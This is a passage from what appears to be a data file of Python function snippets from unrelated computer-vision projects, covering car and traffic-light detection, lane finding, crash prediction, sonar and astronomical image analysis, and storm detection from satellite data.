cv2.putText(output_img, \"Heatmap\", (34, 34), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 0, 0), 2,\n cv2.LINE_AA)\n\n # -----\n return output_img", "def process_image(img, debug=True):\n global X_scaler, svc, feature, heatmap\n\n global top_left_x, top_left_y, bottom_right_x, bottom_right_y\n global start_win_width, start_win_height, end_win_width, end_win_height\n global overlap_frac_x, overlap_frac_y, layer\n\n out_img = np.copy(img)\n\n # When training the model, the images are loaded by cv2 => BGR (they might be converted later, though)\n # Since moviepy read images as RGB, we need to convert them to BGR first\n img = cv2.cvtColor(img, cv2.COLOR_RGB2BGR)\n\n windows = get_windows(img,\n x_start_stop=[top_left_x, bottom_right_x],\n y_start_stop=[top_left_y, bottom_right_y],\n overlap=(overlap_frac_x, overlap_frac_y),\n window_start_size=(start_win_width, start_win_height),\n window_end_size=(end_win_width, end_win_height),\n layers=layer)\n\n car_windows = []\n for window in windows:\n # Extract bounding box image from frame\n cropped_img = get_image_region(img, bbox=window)\n\n # Get feature vector\n feature_vector = feature.extract(cropped_img).astype(np.float64)\n\n # Normalize vector\n scaled_feature_vetor = X_scaler.transform(feature_vector)\n\n # Make prediction\n pred = svc.predict(scaled_feature_vetor)\n\n # If pred[0] == 1. then a car was detected\n if pred[0] == 1.:\n car_windows.append(window)\n\n # Add heat to heatmap where cars were detected\n heatmap.add_heat(car_windows)\n\n # Get labels from heatmap\n l = heatmap.get_labels()\n\n # Create image with all detected labels (post-heatmap)\n label_img = draw_labeled_bboxes(out_img, l)\n\n if debug:\n print('cars found: {}'.format(l[1]))\n\n # Create image with all detected cars (pre-heatmap)\n box_img = draw_boxes(out_img, car_windows)\n\n # Create image that is an average of the last frames heatmap\n last_heatmaps_img = heatmap.last_maps_average()\n\n # Reduce size to 1/3\n small_last_heatmaps_img = cv2.resize(last_heatmaps_img,\n (last_heatmaps_img.shape[1]//3, last_heatmaps_img.shape[0]//3))\n small_current_heatmap_img = cv2.resize(heatmap.current_map, (heatmap.shape[1]//3, heatmap.shape[0]//3))\n small_box_img = cv2.resize(box_img, (box_img.shape[1]//3, box_img.shape[0]//3))\n\n # Create debug view\n right_img = np.vstack((small_last_heatmaps_img, small_current_heatmap_img, small_box_img))\n\n # Add debug view to video\n out_img = np.hstack((label_img,\n right_img))\n else:\n out_img = np.copy(label_img)\n\n # Move current heatmap to archive, create new map for next frame\n heatmap.next_map()\n\n return out_img", "def predict_crashes_with_tracking_visualization(images, carpoints, centered):\n images = images.copy()\n lh = 5\n # plot 5 frames forward\n # check size of the cars to indicate depth\n color = (0, 255, 255)\n wh = [(x[2] - x[0], x[3] - x[1]) for x in carpoints[0]]\n for i in range(len(centered)):\n look_ahead = [[(0, 0) for i in range(len(centered[i]))] for j in range(lh + 1)]\n\n if i in [0]: continue\n\n dxs = [0 for i in range(len(centered[i]))]\n dys = [0 for i in range(len(centered[i]))]\n\n for j in range(len(centered[i])):\n dxs[j] = centered[i][j][0] - centered[i - 1][j][0]\n dys[j] = centered[i][j][1] - centered[i - 1][j][1]\n\n look_ahead[0] = centered[i]\n for j in range(1, lh + 1):\n for k in range(len(centered[i])):\n xc = look_ahead[j - 1][k][0] + dxs[k] * 2\n yc = look_ahead[j - 1][k][1] + dys[k] * 2\n look_ahead[j][k] = (xc, yc)\n # print(look_ahead[j][k])\n curr_image = images[i]\n w, h = wh[k]\n cv2.rectangle(curr_image, (int(xc - w / 2), int(yc - h / 2)), (int(xc + w / 2), int(yc + h / 2)), color,\n 2)\n images[i] = curr_image\n\n for j in range(1, lh + 1):\n min_cars = (0, 0)\n min_dist = 500000000\n wh_ind = (0, 0)\n for k in range(0, len(look_ahead[j]) - 1):\n for l in range(k + 1, len(look_ahead[j])):\n x1, y1 = look_ahead[j][k]\n x2, y2 = look_ahead[j][l]\n dist = math.sqrt((x2 - x1) ** 2 + (y2 - y1) ** 2)\n if dist < min_dist:\n min_dist = dist\n min_cars = (x1, y1, x2, y2)\n wh_ind = (k, l)\n\n x1, y1, x2, y2 = min_cars\n w1, h1 = wh[wh_ind[0]]\n w2, h2 = wh[wh_ind[1]]\n curr_image = images[i]\n cv2.rectangle(curr_image, (int(x1 - w1 / 2), int(y1 - h1 / 2)), (int(x1 + w1 / 2), int(y1 + h1 / 2)),\n (255, 255, 0),\n 2)\n cv2.rectangle(curr_image, (int(x2 - w2 / 2), int(y2 - h2 / 2)), (int(x2 + w2 / 2), int(y2 + h2 / 2)),\n (255, 255, 0),\n 2)\n images[i] = curr_image\n\n return images", "def find_tfl_lights(image: np.ndarray):\n kernel = np.array(\n [[0, 0, 0],\n [0, 0, 0],\n [0, 1, 0],\n [1, 3, 1],\n [0, 1, 0]])\n\n kernel = kernel - kernel.mean()\n\n red_image = image.copy()\n red_image = red_image[:, :, 0]\n _, red_image = cv2.threshold(red_image, 200, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(red_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n red_points = np.where(mask)\n positions = []\n final_red_points = []\n for point1 in range(len(red_points[0])):\n point = (red_points[0][point1], red_points[1][point1])\n pixel = image[point[0], point[1]]\n if (pixel[1] < 170 or pixel[2] < 120) and pixel[0] >= 200:\n final_red_points.append(point)\n final_red_points = filter_points(final_red_points)\n positions += final_red_points\n auxilary = ['r'] * len(positions)\n red_x = [val[1] for val in final_red_points]\n red_y = [val[0] for val in final_red_points]\n green_image = image.copy()\n green_image = green_image[:, :, 1]\n _, green_image = cv2.threshold(green_image, 190, 255, cv2.THRESH_BINARY)\n output = cv2.filter2D(green_image, -1, kernel)\n output_copy = output.copy()\n output = ndimage.maximum_filter(output, size=30)\n output = output - output_copy\n mask = ((output == 0) & (output_copy > 0))\n green_points = np.where(mask)\n final_green_points = []\n for point1 in range(len(green_points[0])):\n point = (green_points[0][point1], green_points[1][point1])\n pixel = image[point[0], point[1]]\n if pixel[0] <= 180 and pixel[1] >= 220 and pixel[2] >= 160:\n final_green_points.append(point)\n\n final_green_points = filter_points(final_green_points)\n positions += final_green_points\n auxilary += ['g'] * len(final_green_points)\n green_x = [val[1] for val in final_green_points]\n green_y = [val[0] for val in final_green_points]\n print(f\"There are {len(green_x) + len(red_x)} points\")\n return positions, auxilary", "def get_classification(self, image):\n\n temp = cv2.cvtColor(cv2.GaussianBlur(image,(5,5),0), cv2.COLOR_BGR2HSV)\n\n maskR = cv2.inRange(temp, np.array([0, 195, 240]), np.array([5, 215, 255]))\n maskY = cv2.inRange(temp, np.array([28, 195, 240]), np.array([35, 215, 255]))\n maskG = cv2.inRange(temp, np.array([60, 195, 240]), np.array([67, 215, 255]))\n\n filt_r = cv2.bitwise_and(temp,temp, mask= maskR)\n filt_y = cv2.bitwise_and(temp,temp, mask= maskY)\n filt_g = cv2.bitwise_and(temp,temp, mask= maskG)\n\n # Bitwise-AND mask and original image\n self.debug_im1 = filt_r\n self.debug_im2 = filt_y\n self.debug_im3 = filt_g\n status = TrafficLight.UNKNOWN\n\n if np.sum(maskR>10):\n print('detected red')\n status = TrafficLight.RED\n elif np.sum(maskY>10):\n print('detected yellow')\n status = TrafficLight.YELLOW\n elif np.sum(maskG>10):\n print('detected green')\n status = TrafficLight.GREEN\n\n # self.debug()\n return status", "def car_zones(self, image, Hp):\n # 1) Load data from the object\n windows_feat = self.sampling_data\n clf = self.clf\n scaler = self.scaler\n overlap = self.overlap\n color_space = self.color_space\n spatial_size = self.spatial_size\n hist_bins = self.hist_bins\n orient = self.orient\n pix_per_cell = self.pix_per_cell\n cell_per_block = self.cell_per_block\n hog_channel = self.hog_channel \n spatial_feat = self.spatial_feat\n hist_feat = self.hist_feat \n hog_feat = self.hog_feat\n \n # 2) Create a copy of the image\n cimage = np.copy (image)\n # 3) Create a empty list where to store the detected windows\n detected_windows_list = []\n # 4) Loop into the windows \n for window_feat in windows_feat:\n # 4.1) Get the window using sliding_window\n windows = slide_window(image, x_start_stop=window_feat[0],\n y_start_stop=window_feat[1], \n xy_window=window_feat[2], \n xy_overlap=overlap)\n # 4.2) Get the local probabilities\n hp, hot_windows = search_windows(cimage, windows, clf, scaler, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat) \n # 4.3) Store the probabilities into the Hp matrix\n Hp = add_probabilities(Hp, hp, windows)\n # 4.4) Store the detected boxes into the list\n detected_windows_list.extend(hot_windows)\n \n # 5) Return the detected windows and the probability matrix (Hp)\n return detected_windows_list, Hp", "def process_image(self, image, debug=False):\n # Get old heatmap from internal deque representation or initialize with zeros if unknown\n old_heatmap = np.zeros(image.shape[0:2]) if len(self.heatmap_deque) == 0 else sum(self.heatmap_deque)\n # Scale image from 0.0..1.0\n modified_image = np.copy(image)/255.\n # Find cars in image\n _, draw_image, labels_heatmap, new_heatmap, agg_heatmap = find_cars_image(modified_image, self.clf,\n self.hyperparams, self.box_color, old_heatmap=old_heatmap)\n # Overlay bounding boxes on top of image\n draw_image[(draw_image == 0).all(2)] = modified_image[(draw_image == 0).all(2)]\n # Add new heatmap to deque\n self.heatmap_deque.append(new_heatmap)\n # In debug mode ...\n if debug:\n # ... create a new canvas\n result_image = np.zeros_like(image).astype(float)\n h = result_image.shape[0]\n w = result_image.shape[1]\n # get the new heatmap and aggregated heatmap as \"fancy heatmap\" representation\n new_heatmap_rgb = fancy_heatmap(new_heatmap, self.hyperparams[\"HEAT_THRESHOLD\"])\n agg_heatmap_rgb = fancy_heatmap(agg_heatmap, self.hyperparams[\"HEAT_THRESHOLD\"])\n # labels_heatmap_rgb will just be the grayscale value scaled to 0..1 and replicated across all 3 channels\n labels_heatmap_rgb = cv2.merge([normalize(labels_heatmap, norm='max')]*3)\n # place all the different images into their respective quadrant of the output canvas\n result_image[0:h//2, 0:w//2] = cv2.resize(draw_image, (w//2, h//2), interpolation=cv2.INTER_AREA)\n result_image[h//2:h, 0:w//2] = cv2.resize(labels_heatmap_rgb, (w//2, h-h//2), interpolation=cv2.INTER_AREA)\n result_image[0:h//2, w//2:w] = cv2.resize(new_heatmap_rgb, (w-w//2, h//2), interpolation=cv2.INTER_AREA)\n result_image[h//2:h, w//2:w] = cv2.resize(agg_heatmap_rgb, (w-w//2, h-h//2), interpolation=cv2.INTER_AREA)\n # rescale result to 0..255\n result_image = (result_image*255).astype(int)\n else:\n # For non-debug mode, just take scaled-back the find_cars draw_image return value\n result_image = (draw_image*255).astype(int)\n return result_image", "def detect(self, img):\n # 1. color filter\n lane_img = self.color_filter(img.copy())\n # 2. gaussian blur\n lane_img = self.gaussian_blur(lane_img)\n # 3.canny edge detection\n lane_img = self.canny(lane_img)\n # 4. region of interest crop\n lane_img = self.region_of_interest(lane_img)\n # 5. hough lines\n lane_img = self.hough_lines(lane_img)\n # 6. overlay lane over original image\n result_img = weighted_img(lane_img, img)\n\n return result_img", "def get_classification(self, cv2_image):\n def get_green_mask(img_hsv):\n lower_green = np.array([40, 10, 10])\n upper_green = np.array([90, 255, 255])\n mask = cv2.inRange(img_hsv, lower_green, upper_green)\n return mask\n\n def get_red_mask(img_hsv):\n # red lower mask (0-10)\n lower_red = np.array([20, 1, 150])\n upper_red = np.array([30, 120, 255])\n mask0 = cv2.inRange(img_hsv, lower_red, upper_red)\n\n # Red upper mask\n lower_red = np.array([170, 50, 50])\n upper_red = np.array([180, 255, 255])\n mask1 = cv2.inRange(img_hsv, lower_red, upper_red)\n\n # join my masks\n mask = mask0 + mask1\n return mask\n\n def get_traffic_light_color(cv2_image):\n # Convert BGR to HSV\n img_hsv = cv2.cvtColor(cv2_image, cv2.COLOR_BGR2HSV)\n height, width, _ = img_hsv.shape\n\n green_mask = get_green_mask(img_hsv)\n red_mask = get_red_mask(img_hsv)\n\n dico = {\n TrafficLight.RED: np.count_nonzero(red_mask[0:int(height / 3), :]),\n TrafficLight.YELLOW: np.count_nonzero(red_mask[int(height / 3):int(height * 2 / 3), :]),\n TrafficLight.GREEN: np.count_nonzero(green_mask[int(height * 2 / 3):height, :])\n }\n\n v = list(dico.values())\n k = list(dico.keys())\n return k[v.index(max(v))]\n\n output_dict = self.run_inference_for_single_image(cv2_image)\n traffic_light_image = self.get_traffic_light(cv2_image, output_dict)\n\n # no traffic light found\n if traffic_light_image is None:\n return TrafficLight.UNKNOWN\n\n return get_traffic_light_color(traffic_light_image)", "def find_tfl_lights(c_image: np.ndarray):\n red_img = c_image[:, :, 0]\n green_img = c_image[:, :, 1]\n new_red = convolution(red_img)\n new_green = convolution(green_img)\n x_red, y_red = get_max_candidate(new_red)\n x_green, y_green = get_max_candidate(new_green)\n return x_red, y_red, x_green, y_green", "def identify_dbs(image):\n locations = {\"red\": Point(), \"green\": Point(), \"blue\": Point()}\n masks = {\"red\": [], \"green\": [], \"blue\": []}\n\n bridge = cv_bridge.CvBridge()\n image = bridge.imgmsg_to_cv2(image, \"bgr8\")\n hsv = cv2.cvtColor(image, cv2.COLOR_BGR2HSV)\n\n # upper and lower bounds for red\n # using python 3 bgr [0,0,188] = hsv [0, 255, 188]\n lower_red = numpy.array([0, 100, 100]) \n upper_red = numpy.array([10, 255, 255])\n masks[\"red\"] = cv2.inRange(hsv, lower_red, upper_red)\n\n # upper and lower bounds for green\n # using python 3 bgr [0,175,0] = hsv [60, 255, 175]\n lower_green = numpy.array([50, 100, 100]) \n upper_green = numpy.array([70, 255, 255])\n masks[\"green\"] = cv2.inRange(hsv, lower_green, upper_green)\n\n # upper and lower bounds for blue\n # using python 3 bgr [176, 0, 17] = hsv [123, 255, 176]\n lower_blue = numpy.array([113, 100, 100])\n upper_blue = numpy.array([133, 255, 255])\n masks[\"blue\"] = cv2.inRange(hsv, lower_blue, upper_blue)\n\n x, y, w, h = 0, 0, image.shape[1]//3, image.shape[0]\n\n for color, mask in masks.items():\n pixels = {\"left\": 0, \"middle\": 0, \"right\": 0}\n \n # define section of image to use for left, middle and right\n left = mask[y:y+h, x:x+w]\n middle = mask[y:y+h, x+w:x+w+w]\n right = mask[y:y+h, x+w+w:x+3*w]\n\n # count the number of pixels in each section\n pixels[\"left\"] = cv2.countNonZero(left)\n pixels[\"middle\"] = cv2.countNonZero(middle)\n pixels[\"right\"] = cv2.countNonZero(right)\n location = max(pixels, key=pixels.get)\n\n # map the relative position of the db (left, middle, right) to the correct Point()\n locations[color] = db_locations[location]\n \n return locations", "def detect_cars(img, clf, xy_window, stride, cur_sizes_factors, cur_y_start_stop, cur_x_padding):\n\n image_tar_size = (int(img.shape[0] * cur_sizes_factors),\n int(img.shape[1] * cur_sizes_factors))\n\n # open cv needs the shape in reversed order (width, height)\n img_scaled = cv2.resize(img, image_tar_size[::-1])\n # check if search area is smaller than window.\n cur_y_start_stop = (cur_y_start_stop * cur_sizes_factors).astype(np.uint32)\n\n # if the window size is bigger than the search area return an empty array\n search_area_height = cur_y_start_stop[1] - cur_y_start_stop[0]\n if search_area_height < xy_window[1] or img_scaled.shape[1] < xy_window[0]:\n return np.ndarray((0, 4))\n\n # Add padding (zeros) on the x axis\n img_scaled = add_padding(img_scaled, cur_x_padding)\n windows = slide_window(img_scaled, y_start_stop=cur_y_start_stop, xy_window=xy_window,\n stride=stride)\n\n features = extract_features(img_scaled, clf, windows, cur_y_start_stop, xy_window, stride)\n des_func = clf.named_steps['clf'].decision_function(features)\n\n windows = remove_padding_from_bb(windows, cur_x_padding)\n # windows have to be rescaled to account for the resized image\n windows = (windows / cur_sizes_factors).astype(np.uint32)\n windows = windows[des_func > 0]\n\n des_func = des_func[des_func > 0]\n\n return windows, des_func", "def find_gate_posts(img, display_results=False):\n\n greyscale_image = cv2.cvtColor(img.astype(np.uint8), cv2.COLOR_GRAY2BGR)\n cm_image = cv2.applyColorMap(greyscale_image, cv2.COLORMAP_VIRIDIS)\n\n kernel = np.ones((5, 5), np.uint8)\n\n # cm_image = cv2.erode(cm_image, kernel, iterations=1)\n kernel = np.ones((5, 5), np.uint8)\n cm_image = cv2.dilate(cm_image, kernel, iterations=3)\n kernel = np.ones((4, 4), np.uint8)\n cm_image = cv2.erode(cm_image, kernel, iterations=1)\n\n cm_image = cv2.medianBlur(cm_image, 5) # Removes salt and pepper noise\n\n cm_copy_image = cm_image\n cv2.copyTo(cm_image, cm_copy_image)\n\n mask = mask_sonar_image(cm_image, display_results)\n\n cm_circles = cv2.findContours(mask, cv2.RETR_LIST,\n cv2.CHAIN_APPROX_SIMPLE)[-2]\n\n cm_circles = list(filter(lambda x: (cv2.contourArea(x) > 200\n and cv2.contourArea(x) < 5000),\n cm_circles))\n cm_circles = sorted(cm_circles,\n key=lambda x: (arc_circ(x)),\n reverse=False)\n\n cm_circles = list(filter(lambda x: (cv2.arcLength(x, True)**2/(4\n * math.pi*cv2.contourArea(x)) > 2.5), cm_circles))\n\n if len(cm_circles) < 1:\n print(\"Not enough circles found\")\n return None\n\n filtered_circles = cm_circles[0:1]\n\n circle_positions = []\n for circle in filtered_circles: # find center of circle code\n M = cv2.moments(circle)\n cX = int(M[\"m10\"] / M[\"m00\"])\n cY = int(M[\"m01\"] / M[\"m00\"])\n circle_positions.append((cX, cY, arc_circ(circle), cv2.arcLength(\n circle, True)**2/(4*math.pi*cv2.contourArea(circle))))\n\n if display_results:\n cv2.drawContours(cm_copy_image, filtered_circles, -1, (0, 255, 0), 2)\n cv2.imshow(\"found_gate_posts\", cm_copy_image)\n cv2.waitKey(0)\n\n return circle_positions", "def vision(image):\n vis_map = resize(image, alpha, beta)\n print(\"Resized map from the blue mask\")\n\n world = rotate(vis_map)\n\n plt.figure()\n plt.imshow(world[:, :, ::-1])\n plt.show()\n object_grid, occupancy_grid = detect_object(world)\n print(\"Result of the red mask\")\n plt.figure()\n plt.imshow(occupancy_grid)\n plt.show()\n return object_grid, occupancy_grid, world", "def get_classification_simulator(self, image):\n\n r_channel = image[:,:,2]\n g_channel = image[:,:,1]\n\n\n\n # Threshold color channel\n s_rgy_min = 50\n s_thresh_min = 245\n s_thresh_max = 255\n \n #s_binary = np.zeros_like(r_channel)\n r_binary = np.zeros_like(r_channel)\n g_binary = np.zeros_like(r_channel)\n y_binary = np.zeros_like(r_channel)\n \n #s_binary[((r_channel >= s_thresh_min) & (r_channel <= s_thresh_max)) | ((g_channel >= s_thresh_min) & (g_channel <= s_thresh_max))] = 1\n \n \n r_binary[((r_channel >= s_thresh_min) & (r_channel <= s_thresh_max)) & (g_channel <= s_rgy_min)] = 1\n g_binary[((g_channel >= s_thresh_min) & (g_channel <= s_thresh_max)) & (r_channel <= s_rgy_min)] = 1\n y_binary[((r_channel >= s_thresh_min) & (r_channel <= s_thresh_max)) & ((g_channel >= s_thresh_min) & (g_channel <= s_thresh_max))] = 1\n \n\n #res = cv2.bitwise_and(img,img,mask = s_binary)\n \n #maxx=image.shape[1]\n maxy=image.shape[0]\n \n y_top=0\n window_size_y=50\n y_bottom=y_top+window_size_y\n \n max_color=0\n tf_color=TrafficLight.UNKNOWN\n \n while (y_bottom< maxy):\n #print(img[y_top:y_bottom,:,:])\n rs= r_binary[y_top:y_bottom,:].sum()\n gs= g_binary[y_top:y_bottom,:].sum()\n ys= y_binary[y_top:y_bottom,:].sum()\n if (rs>max_color):\n max_color=rs\n tf_color=TrafficLight.RED\n if (gs>max_color):\n max_color=gs\n tf_color=TrafficLight.GREEN\n if (ys>max_color):\n max_color=ys\n tf_color=TrafficLight.YELLOW\n y_top+=window_size_y\n y_bottom+=window_size_y\n \n if (max_color<100):\n tf_color=TrafficLight.UNKNOWN\n \n\n\n return tf_color", "def find_components(image,deltaPix,lens_rad_arcsec = 6.0,lens_rad_ratio = None,\n center_x = None,center_y = None, gal_rad_ratio = 0.1,\n min_size_arcsec=0.7,thresh=0.5, many_sources = True,\n show_locations=False, title = None):\n\n # convert minimum component size in pixel units\n min_size = int(min_size_arcsec / deltaPix)\n \n #Convert lens radius and central galaxy radius to pixels\n if lens_rad_ratio == None:\n lens_rad = int(lens_rad_arcsec / deltaPix)\n else: lens_rad = int(len(image) * lens_rad_ratio)\n gal_rad = int(len(image) * gal_rad_ratio)\n \n \n# im2[im2 < im2.min() + 10.*thresh] = 0.\n \n # downscale source image to data resolution (for speed + easier for converting to data units)\n #down = image_util.re_size(image, factor=supersampling_factor_source)\n \n # apply laplacian of gaussian (LoG) filter to enhance maxima\n LoG = - gaussian_laplace(deepcopy(image), sigma = min_size, mode='constant', cval=0.) \n \n# LoG = - gaussian_laplace(deepcopy(im2), sigma = 2., mode='constant', cval=0.)\n \n filtered = deepcopy(LoG)\n \n# print(LoG.min(),LoG.max(),np.abs(LoG.min()) + thresh )\n \n# print(type(filtered))\n \n #background mean and std of filtered image \n corners = np.zeros([4,5,5])\n corners[0] = LoG[0:5,0:5]\n corners[1] = LoG[-5:,0:5]\n corners[2] = LoG[0:5,-5:]\n corners[3] = LoG[-5:,-5:]\n means = []\n stds = []\n for c in corners:\n mn,med,s = sigma_clipped_stats(c,sigma=3.0)\n means.append(mn)\n stds.append(s)\n \n stds=np.array(stds)\n means = np.array(means)\n means_std = np.std(means)\n# means_good = means[(means >= means.mean() - 1.0 * means_std) & (means <= means.mean() + 1.0 * means_std)]\n means_good = means[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)]\n mean_bg = np.mean(means_good)\n std_bg = np.mean(stds[(np.abs(means) <= np.abs(means).min() + 1.0 * means_std)])\n# print('LoG means: {}, Log means std: {}, Log means good: {}, LoG avg mean: {}'.format(means,means_std,means_good,mean_bg))\n# print('min: {}, max: {}, cut: {}'.format(LoG.min(),LoG.max(),mean_bg + thresh))\n# print(LoG.min(),LoG.max(),filtered.min() + thresh)\n \n \n # assume all value below max*threshold can not be maxima, so put all to zero\n# filtered[filtered < thresh*filtered.max()] = 0.\n \n# assume all value below min*threshold can not be maxima, so put all to zero\n# filtered[filtered < filtered.min() + thresh * np.abs(filtered.min())] = 0.\n# filtered[filtered < mean_bg + thresh] = 0.\n filtered[filtered < mean_bg + 6.*std_bg] = 0. #set pixels below the mean + 6x threshold to 0\n \n # find coordinates of local maxima\n #print(int(0.5 * min_size))\n max_idx_2d_small = peak_local_max(filtered, min_distance=0) #All bright pixels\n max_idx_2d_large = peak_local_max(filtered, min_distance=1) #peaks with min size of 1 pixel\n \n x_list_small, y_list_small = max_idx_2d_small[:, 1], max_idx_2d_small[:, 0]\n x_list_large, y_list_large = max_idx_2d_large[:, 1], max_idx_2d_large[:, 0]\n \n im_center_x, im_center_y = len(image) / 2., len(image) / 2. #center of image\n \n if (center_x == None) & (center_y == None):\n new_center_x, new_center_y = im_center_x,im_center_y\n else:\n new_center_x, new_center_y = center_x,center_y #new \"center\" = location of lens galaxy\n \n \n #distance of each detected peak from center\n R_small = np.sqrt((x_list_small - new_center_x)**2 + (y_list_small - new_center_y)**2) \n R_large = np.sqrt((x_list_large - new_center_x)**2 + (y_list_large - new_center_y)**2)\n \n #Contaminant light is only bright pixels further from center than lens_rad\n x_sats, y_sats = x_list_small[R_small > lens_rad], y_list_small[R_small > lens_rad]\n \n if many_sources:\n x_lens, y_lens = deepcopy(x_list_small), deepcopy(y_list_small)\n else:\n x_lens, y_lens = deepcopy(x_list_large), deepcopy(y_list_large)\n \n# x_lens, y_lens = x_list_small[R_small <= lens_rad], y_list_small[R_small <= lens_rad]\n \n if (len(x_lens) == 0) & (len(y_lens) == 0):\n x_lens = [0,15]\n y_lens = [0,15]\n \n sources = QTable([x_lens, y_lens],names={'x_local_peak','y_local_peak'}) #make table of all detected objects\n# print(x_list_large)\n# print(y_list_large)\n# print(sources)\n \n # show maxima on image for debug\n \n if show_locations:\n# fig = plt.figure(figsize=(4, 4))\n #plt.imshow(image, origin='lower', cmap=cmap_flux, norm=LogNorm(1e-2))\n \n f, axes = plt.subplots(1, 5, figsize=(20,5), sharex=False, sharey=False)\n# plt.figure(figsize = (8,8))\n# plt.subplot(1,2,1)\n \n axes[0].imshow(image, origin='lower', norm=SymLogNorm(5))\n axes[0].set_title('Image')\n axes[0].set_axis_off()\n \n \n axes[1].imshow(LoG, origin='lower', norm=SymLogNorm(5))\n axes[1].set_title('LoG Filtered Image')\n axes[1].set_axis_off()\n\n# plt.subplot(1,2,2)\n axes[2].imshow(filtered, origin='lower', norm=SymLogNorm(5))\n axes[2].set_title('Final Filtered Image')\n axes[2].set_axis_off()\n \n axes[3].imshow(image, origin='lower', norm=SymLogNorm(5))\n for i in range(len(x_lens)):\n axes[3].scatter([x_lens[i]], [y_lens[i]], c='red', s=60, marker='+')\n \n for i in range(len(x_list_large)):\n axes[3].scatter([x_list_large[i]], [y_list_large[i]], c='black', s=100, marker='x')\n axes[3].set_title('Detected Objects')\n axes[3].set_axis_off()\n \n axes[4].imshow(image, origin='lower', norm=SymLogNorm(5))\n \n for i in range(len(x_sats)):\n axes[4].scatter([x_sats[i]], [y_sats[i]], c='red', s=60, marker='+')\n \n# plt.annotate(i+1, (x_list[i], y_list[i]), color='black')\n \n# for i in range(len(x_mask)):\n# plt.scatter([x_mask[i]], [y_mask[i]], c='red', s=100, marker='*')\n# plt.annotate(i+1, (x_mask[i], y_mask[i]), color='red')\n axes[4].scatter(new_center_x, new_center_y,c='red', s=100, marker='*')\n \n draw_lens_circle = Circle((new_center_x, new_center_y),lens_rad ,fill=False)\n draw_gal_circle = Circle((new_center_x, new_center_y),gal_rad, fill = False)\n# plt.gcf().gca().add_artist(draw_lens_circle)\n# plt.gcf().gca().add_artist(draw_gal_circle)\n axes[4].add_patch(draw_lens_circle)\n# axes[4].add_patch(draw_gal_circle)\n \n axes[4].set_title('Pixels to Mask: \\n r = {:.3f}'.format(lens_rad_arcsec))\n axes[4].text(1, 1, \"detected components\", color='red')\n axes[4].set_axis_off()\n \n if title != None:\n f.suptitle(title, fontsize = 15)\n# plt.show()\n \n \n return (x_sats, y_sats), (new_center_x, new_center_y), sources", "def drawCars(self):\n for car in self.cars:\n if car.aliveForFrames >= ALIVE_THRESHOLD:\n msg = 'ID: {0:>2}\\n'.format(car.id)\n msg += 'conf:{0:.2f}%\\n'.format(car.displayedConfidence * 100)\n msg += 'active: {} frames'.format(car.aliveForFrames - car.aliveForFrames % 5)\n self.car_detector.draw_boxes(self.image, tuple(car.box), msg)\n\n return self.image", "def process_tir_image(ds, data_res, t_thresh=-50, min_mcs_size=5000):\n ctt = (ds['tb']).squeeze()-273.15\n min_pix_nb = min_mcs_size / data_res**2\n\n max_pix_nb = 300000 / data_res**2 # this is to capture satellite artefacts that come in large contiguous stripes.\n labels, goodinds = mcs_define(ctt.values, t_thresh, minmax_area=[min_pix_nb, max_pix_nb]) # 7.7x7.7km = 64km2 per pix in gridsat? 83 pix is 5000km2\n dic = dictionary()\n #plt.figure()\n #plt.pcolormesh(labels)\n #plt.colorbar()\n #plt.show()\n for g in goodinds:\n\n if g==0:\n continue\n\n pos = np.where(labels==g)\n npos = np.where(labels!=g)\n datestr = str(int(ctt['time.year'].values))+'-'+str(int(ctt['time.month'].values)).zfill(2)+'-'+str(int(ctt['time.day'].values)).zfill(2)+'_'+\\\n str(int(ctt['time.hour'].values)).zfill(2)+':'+str(int(ctt['time.minute'].values)).zfill(2)\n \n dic['date'].append(datestr)\n dic['month'].append(int(ctt['time.month']))\n dic['hour'].append(int(ctt['time.hour']))\n dic['year'].append(int(ctt['time.year']))\n dic['day'].append(int(ctt['time.day']))\n dic['minute'].append(int(ctt['time.minute']))\n\n storm = ctt.copy()\n storm.values[npos] = np.nan\n tmin_pos = np.nanargmin(storm.values)\n tpos_2d = np.unravel_index(tmin_pos, storm.shape)\n \n latmin = np.nanmin(ctt.lat.values[pos[0]])\n latmax = np.nanmax(ctt.lat.values[pos[0]])\n lonmin = np.nanmin(ctt.lon.values[pos[1]])\n lonmax = np.nanmax(ctt.lon.values[pos[1]])\n dic['area'].append(np.sum(np.isfinite(storm.values))*data_res**2)\n dic['70area'].append(np.sum(storm.values<=-70)*data_res**2)\n dic['minlon'].append(lonmin)\n dic['minlat'].append(latmin)\n dic['maxlon'].append(lonmax)\n dic['maxlat'].append(latmax)\n dic['clon'].append(lonmin + (lonmax - lonmin)/2)\n dic['clat'].append(latmin + (latmax - latmin)/2)\n dic['tmin'].append(np.nanmin(storm))\n dic['tminlat'].append(float(ctt.lat[tpos_2d[0]].values))\n dic['tminlon'].append(float(ctt.lon[tpos_2d[1]].values))\n dic['tmean'].append(float(np.nanmean(storm)))\n dic['tp1'].append(float(np.nanpercentile(storm, 1)))\n dic['tp99'].append(float(np.nanpercentile(storm, 99)))\n dic['stormID'].append(datestr + '_' + str(g))\n dic['cloudMask'].append(labels==g)\n dic['tir'].append(storm.values)\n\n # for k in dic.keys():\n # print(k, len(dic[k]))\n return dic", "def detect_crashes(images, carpoints, centered):\n images = images.copy()\n updated_car_points = [[] for i in range(len(centered))]\n crash_frames = []\n color = (0, 0, 255)\n\n for i in range(len(centered)):\n curr_points = centered[i]\n print('i value: ' + str(i))\n if i in [0, 1]:\n for j in range(len(curr_points)):\n curr_x, curr_y = curr_points[j]\n updated_car_points[i].append((curr_x, curr_y, 0))\n else:\n for j in range(len(curr_points)):\n ''' Include case where new car point is not close to any of the other car points. Like taking care of\n adding new points. '''\n curr_x, curr_y = curr_points[j]\n min_ind, min_dist = find_closest((curr_x, curr_y), updated_car_points[i - 2])\n print('Min Dist, Min Index: %f, %i' % (min_dist, min_ind))\n prev_x, prev_y, old_mag = updated_car_points[i - 2][min_ind]\n\n # Now compare with prev\n\n new_mag = math.sqrt((curr_x - prev_x) ** 2 + (curr_y - prev_y) ** 2)\n print('Old: %f -- New: %f' % (old_mag, 